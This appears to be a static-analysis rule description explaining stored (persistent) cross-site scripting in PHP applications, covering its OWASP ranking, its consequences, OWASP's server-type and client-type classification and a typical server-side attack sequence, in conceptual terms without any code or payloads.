PHP : Persistent XSS

Stored (persistent) cross-site scripting attack (XSS) is possible.

Cross-site scripting is one of the most common types of attacks on web applications. XSS-attacks take the seventh place in the OWASP Top 10 2017 ranking of the most significant web application vulnerabilities.

The main phase of any XSS-attack is imperceptible for the victim execution of a malicious code in the context of a vulnerable application. For this purpose, the functionality of the client application (browser) is used that allows to automatically execute scripts embedded in web page code. In most cases, these malicious scripts are implemented in JavaScript.

Consequences of XSS may vary from violations of application functionality to complete loss of privacy of the user data. The malicious code during the XSS-attack can steal user HTTP-cookie that give an attacker the ability to make requests to the server on behalf of the user.

OWASP proposes the following classification of XSS-attacks:

• Server type XSS occurs when data from an unreliable source is included into the response returned by the server. The source of such data can be both user input and server database (where it had been previously injected by exploiting server-side vulnerabilities).
• Client type XSS occurs when raw data from the user input contains code that changes the Document Object Model (DOM) of the web page received from the server. The source of such data can be both the DOM and the data received from the server (for example, in response to an AJAX-request).

Typical server-type attack scenario:

1. Unchecked data, usually from the HTTP-request, get into the server part of the application.
2. The server dynamically generates a web page that contains the unvalidated data.
3. In the process of generating a web page server does not prevent the inclusion of code that can be executed in the client (browser), such as JavaScript code, HTML tags, HTML attributes, Flash, ActiveX, etc., into the code of the page.
4. The victim’s client application displays the web page that contains the embedded malicious code due to the usage of data from an untrusted source.
5. Since malicious code is embedded in the web page coming from the known server, the client part of the application (browser) executes it with the permissions of the application.
6. This violates the same-origin policy, according to which the code from the one source must not get access to resources from another source.

Client type attacks are executed in a similar way, the only difference being that the malicious code is injected on the stage of the client application work with the document object model received from the server.